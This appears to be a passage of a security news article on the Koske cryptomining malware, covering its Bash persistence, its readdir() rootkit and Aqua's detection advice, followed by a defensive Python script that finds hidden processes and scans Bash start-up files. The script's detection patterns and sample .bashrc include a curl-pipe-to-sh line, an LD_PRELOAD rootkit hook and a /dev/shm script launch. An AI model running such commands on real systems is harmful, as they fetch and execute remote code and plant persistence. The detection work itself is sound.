Modular payload for stealth and persistence: Koske employs multiple tactics to stay hidden and persistent. It hijacks hidden configuration files used by the Bash shell to execute a custom system script that maintains communication with the command-and-control (C2) infrastructure for persistence.

Additionally, the rootkit, written in C, hijacks readdir(), a system call for reading directory content, to conceal processes and files named “Koske” or “hideproc.”

The malware registers itself as a background service, sets up recurring scheduled tasks, and evades detection by concealing its processes from standard monitoring tools. Its adaptive logic, including proxy-checking routines, an intelligent selection among 18 cryptocurrency miners, and fallback behaviors, is likely a borrowed AI function, Morag noted in the blog.

Aqua recommended monitoring unauthorized Bash modifications and unexpected DNS rewrites, and using runtime protection telemetry to spot anomalous shell behavior. Additionally, blocking execution of polyglot file payloads and hidden rootkits (with drift prevention) was advised. The blog shared a few indicators of compromise (IOCs), including IP addresses, URLs, and filenames used in the attacks.
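The two behaviors above, a readdir() hook that filters process listings and tampered Bash start-up files, can both be checked from the defender's side without any knowledge of the specific samples. The script below is an added example, not code from the report or from Aqua: it enumerates /proc by stat()-ing each candidate PID (which a readdir() hook cannot filter) and compares that with the readdir() view, and it scans the usual Bash start-up files for lines that chain-load scripts in ways a login script rarely does. The only names taken from the report are "Koske" and "hideproc"; the file list, the heuristic patterns and the sample .bashrc lines are assumptions of this example.

```python
#!/usr/bin/env python3
"""Defender-side checks for the two Koske behaviours described above.
Hypothetical example code; only the names "Koske" and "hideproc" come from the
report. File paths, patterns and sample data are assumptions of this example."""
import os
import re
from typing import Dict, Iterable, List, Set, Tuple

# --- 1. Processes hidden from readdir() ------------------------------------

def listed_pids() -> Set[int]:
    """PIDs as returned by readdir() on /proc: the view a readdir() hook can filter."""
    return {int(name) for name in os.listdir("/proc") if name.isdigit()}

def probed_pids(max_pid: int = 0) -> Set[int]:
    """PIDs found by stat()-ing /proc/<pid> one by one, which bypasses readdir()."""
    if not max_pid:
        try:
            with open("/proc/sys/kernel/pid_max") as fh:
                max_pid = int(fh.read())
        except OSError:
            max_pid = 32768  # fallback upper bound if pid_max is unreadable
    return {pid for pid in range(1, max_pid + 1) if os.path.isdir(f"/proc/{pid}")}

def hidden_pids(listed: Iterable[int], probed: Iterable[int]) -> List[int]:
    """PIDs reachable by stat() but absent from the directory listing."""
    return sorted(set(probed) - set(listed))

def find_hidden_processes() -> Dict[int, str]:
    """Map hidden PID -> command name. The listing is re-read after the slow
    probe so processes that started or exited mid-scan are not reported."""
    before = listed_pids()
    candidates = hidden_pids(before, probed_pids())
    after = listed_pids()
    result: Dict[int, str] = {}
    for pid in candidates:
        if pid in after or not os.path.isdir(f"/proc/{pid}"):
            continue  # became visible legitimately, or exited during the scan
        try:
            with open(f"/proc/{pid}/comm") as fh:
                result[pid] = fh.read().strip()
        except OSError:
            result[pid] = "?"
    return result

# --- 2. Tampered Bash start-up files ---------------------------------------

BASH_STARTUP_FILES = [
    "/etc/profile", "/etc/bash.bashrc", "/etc/bashrc",
    os.path.expanduser("~/.bashrc"), os.path.expanduser("~/.bash_profile"),
    os.path.expanduser("~/.profile"),
]

# Heuristics assumed by this example: constructs that rarely belong in a login script.
SUSPICIOUS_PATTERNS: List[Tuple[re.Pattern, str]] = [
    (re.compile(r"(?:^|[\s;&|(])(?:\.|source|bash|sh|exec|nohup)\s+\S*(?:/tmp/|/dev/shm/|/var/tmp/)"),
     "runs a script from a world-writable temp directory"),
    (re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:ba)?sh\b"),
     "pipes a download straight into a shell"),
    (re.compile(r"\bLD_PRELOAD="),
     "sets LD_PRELOAD, the usual way a user-mode rootkit hooks readdir()"),
    (re.compile(r"koske|hideproc", re.IGNORECASE),
     "references a name the report associates with Koske"),
]

def scan_bash_lines(lines: Iterable[str]) -> List[Tuple[int, str, str]]:
    """Return (line_number, reason, line) for every non-comment line that matches."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for pattern, reason in SUSPICIOUS_PATTERNS:
            if pattern.search(stripped):
                findings.append((lineno, reason, stripped))
    return findings

def scan_bash_startup_files(paths: Iterable[str] = BASH_STARTUP_FILES) -> Dict[str, list]:
    """Scan each readable start-up file; unreadable or missing files are skipped."""
    report = {}
    for path in paths:
        try:
            with open(path, errors="replace") as fh:
                hits = scan_bash_lines(fh)
        except OSError:
            continue
        if hits:
            report[path] = hits
    return report

# Constructed sample .bashrc fragment (not from the report) to exercise the scanner.
SAMPLE_BASHRC = [
    "# ~/.bashrc",
    "export PATH=$HOME/bin:$PATH",
    "alias ll='ls -la'",
    "nohup bash /dev/shm/.cache/update.sh >/dev/null 2>&1 &",
    "export LD_PRELOAD=/usr/local/lib/libplaceholder.so",
    "curl -fsSL http://example.invalid/s | sh",
]

if __name__ == "__main__":
    for pid, comm in find_hidden_processes().items():
        print(f"hidden process pid={pid} comm={comm}")
    for path, hits in scan_bash_startup_files().items():
        for lineno, reason, line in hits:
            print(f"{path}:{lineno}: {reason}: {line}")
```

The PID probe walks every value up to kernel.pid_max, so on hosts with a large pid_max it takes tens of seconds; that is the price of not trusting readdir(). It only catches hooks that filter directory listings: a rootkit that also intercepts stat() on /proc entries would need a comparison against a trusted source such as an out-of-band kernel view or an agent's runtime telemetry, which is what the runtime-protection recommendation above points at. The start-up file scanner is deliberately narrow; pair it with file-integrity monitoring on the same paths so that any modification, not just one matching a pattern, raises an alert.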
First seen on csoonline.com
Jump to article: www.csoonline.com/article/4028933/ai-forged-panda-images-hide-persistent-cryptomining-malware-koske.html

